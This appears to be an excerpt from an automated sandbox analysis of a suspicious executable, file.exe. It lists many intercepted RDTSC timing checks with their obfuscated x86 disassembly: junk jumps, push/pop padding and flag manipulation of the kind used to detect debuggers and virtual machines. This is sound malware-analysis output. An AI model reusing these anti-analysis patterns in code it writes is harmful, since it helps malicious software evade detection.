Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0012B second address: 4D00131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00131 second address: 4D00135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00135 second address: 4D001E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e pushad 0x0000000f call 00007F9558C389FEh 0x00000014 pushfd 0x00000015 jmp 00007F9558C38A02h 0x0000001a sbb ecx, 2ACCAC38h 0x00000020 jmp 00007F9558C389FBh 0x00000025 popfd 0x00000026 pop esi 0x00000027 mov dh, 3Bh 0x00000029 popad 0x0000002a push dword ptr [ebp+0Ch] 0x0000002d pushad 0x0000002e call 00007F9558C389FEh 0x00000033 pushfd 0x00000034 jmp 00007F9558C38A02h 0x00000039 or esi, 4408E5C8h 0x0000003f jmp 00007F9558C389FBh 0x00000044 popfd 0x00000045 pop eax 0x00000046 mov esi, edi 0x00000048 popad 0x00000049 push dword ptr [ebp+08h] 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F9558C38A07h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D001E6 second address: 4D0022D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F95588494B8h 0x00000008 adc esi, 337D9A88h 0x0000000e jmp 00007F95588494ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F95588494B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20D65 second address: 4D20D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C389FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20D75 second address: 4D20D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20D79 second address: 4D20D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F9558C389FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9558C389FAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20D9F second address: 4D20DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20DA3 second address: 4D20DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20DA9 second address: 4D20DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95588494ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20DBA second address: 4D20DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2082A second address: 4D20842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95588494B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20842 second address: 4D20860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9558C38A03h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20744 second address: 4D20765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95588494B7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20765 second address: 4D2077D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20546 second address: 4D20580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 4FD87523h 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95588494B0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20580 second address: 4D20586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20586 second address: 4D2058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2058A second address: 4D2058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2058E second address: 4D205EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F95588494B9h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F95588494AEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F95588494ADh 0x0000001f adc esi, 4E5407E6h 0x00000025 jmp 00007F95588494B1h 0x0000002a popfd 0x0000002b mov dx, si 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3030C second address: 4D30310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30310 second address: 4D30316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30316 second address: 4D30328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C389FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30328 second address: 4D3032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3032C second address: 4D3039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F9558C389FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F9558C38A00h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F9558C38A00h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 72DF37E0h 0x00000026 pushfd 0x00000027 jmp 00007F9558C38A09h 0x0000002c or cl, FFFFFFE6h 0x0000002f jmp 00007F9558C38A01h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404B0 second address: 4D404C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95588494B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404C8 second address: 4D404CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404CC second address: 4D404DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404DB second address: 4D404DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404DF second address: 4D404E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D404E5 second address: 4D40500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A07h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40500 second address: 4D40504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40504 second address: 4D405A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9558C389FBh 0x00000012 sbb ch, 0000001Eh 0x00000015 jmp 00007F9558C38A09h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F9558C38A00h 0x00000021 sbb ch, 00000018h 0x00000024 jmp 00007F9558C389FBh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d jmp 00007F9558C38A06h 0x00000032 mov eax, dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 movzx eax, bx 0x00000039 jmp 00007F9558C38A03h 0x0000003e popad 0x0000003f and dword ptr [eax], 00000000h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9558C38A05h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D405A7 second address: 4D405FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007F95588494AEh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F95588494ADh 0x0000001c and eax, 5DFB61D6h 0x00000022 jmp 00007F95588494B1h 0x00000027 popfd 0x00000028 movzx ecx, di 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D405FC second address: 4D40602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40602 second address: 4D40606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40030 second address: 4D40035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40035 second address: 4D40090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95588494ACh 0x0000000a adc ecx, 75B49F48h 0x00000010 jmp 00007F95588494ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F95588494AFh 0x00000021 sbb si, 818Eh 0x00000026 jmp 00007F95588494B9h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40090 second address: 4D400CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F9558C38A02h 0x0000000f add si, 4F38h 0x00000014 jmp 00007F9558C389FBh 0x00000019 popfd 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edx, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D400CA second address: 4D400CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D400CF second address: 4D400F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9558C38A00h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D400F7 second address: 4D400FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D400FB second address: 4D40101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D402ED second address: 4D40326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F95588494B1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov eax, 6F275D23h 0x00000016 mov ah, A8h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40326 second address: 4D4032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D4032A second address: 4D40346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40346 second address: 4D40358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C389FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D606D8 second address: 4D606E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D606E9 second address: 4D60704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9558C38A05h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60704 second address: 4D60749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f pushfd 0x00000010 jmp 00007F95588494AEh 0x00000015 jmp 00007F95588494B5h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F95588494ADh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60749 second address: 4D6074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6074F second address: 4D60753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60753 second address: 4D60785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9558C38A05h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60785 second address: 4D6078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6078B second address: 4D607C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F9558C38A06h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cl, 6Eh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D607C2 second address: 4D607C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D607C8 second address: 4D607CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D607CC second address: 4D607FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F95588494B0h 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D607FA second address: 4D607FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D607FE second address: 4D60804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60804 second address: 4D6080A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6080A second address: 4D6080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6080E second address: 4D6081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6081D second address: 4D60898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, BF17h 0x00000008 popad 0x00000009 je 00007F95CAA1C5E6h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F95588494B8h 0x00000016 or ax, 7FB8h 0x0000001b jmp 00007F95588494ABh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F95588494B8h 0x00000027 jmp 00007F95588494B5h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ecx, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F95588494ADh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60898 second address: 4D608CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F9558C38A07h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D608CF second address: 4D608D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D608D7 second address: 4D60932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007F9558C38A06h 0x00000010 leave 0x00000011 jmp 00007F9558C38A00h 0x00000016 retn 0004h 0x00000019 nop 0x0000001a mov esi, eax 0x0000001c lea eax, dword ptr [ebp-08h] 0x0000001f xor esi, dword ptr [00132014h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push eax 0x00000028 lea eax, dword ptr [ebp-10h] 0x0000002b push eax 0x0000002c call 00007F955D8A9250h 0x00000031 push FFFFFFFEh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 call 00007F9558C389FDh 0x0000003b pop ecx 0x0000003c mov dx, 31A4h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60932 second address: 4D60987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F95588494B0h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007F955D4B9D31h 0x00000017 mov edi, edi 0x00000019 jmp 00007F95588494B0h 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F95588494B0h 0x00000024 push eax 0x00000025 jmp 00007F95588494ABh 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D60987 second address: 4D6098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, ECh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D6098E second address: 4D609BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95588494B5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D609BE second address: 4D609E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9558C389FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10016 second address: 4D1001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1001A second address: 4D10020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10020 second address: 4D1007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, E653h 0x00000007 pushfd 0x00000008 jmp 00007F95588494B8h 0x0000000d add ax, 1FD8h 0x00000012 jmp 00007F95588494ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F95588494B6h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F95588494ADh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1007D second address: 4D10083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10083 second address: 4D10107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 67B9h 0x00000007 pushfd 0x00000008 jmp 00007F95588494B6h 0x0000000d jmp 00007F95588494B5h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F95588494AEh 0x0000001c mov ebp, esp 0x0000001e jmp 00007F95588494B0h 0x00000023 and esp, FFFFFFF8h 0x00000026 pushad 0x00000027 mov cx, 70EDh 0x0000002b pushfd 0x0000002c jmp 00007F95588494AAh 0x00000031 xor ecx, 6008D888h 0x00000037 jmp 00007F95588494ABh 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10107 second address: 4D1010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1010C second address: 4D1012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007F95588494AFh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov edi, eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1012B second address: 4D10188 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9558C389FEh 0x00000008 and eax, 4A0E4D48h 0x0000000e jmp 00007F9558C389FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ah, 4Ch 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a pushad 0x0000001b push ebx 0x0000001c call 00007F9558C389FCh 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 push esi 0x00000024 jmp 00007F9558C38A07h 0x00000029 pop eax 0x0000002a popad 0x0000002b push ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov si, bx 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10188 second address: 4D1018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
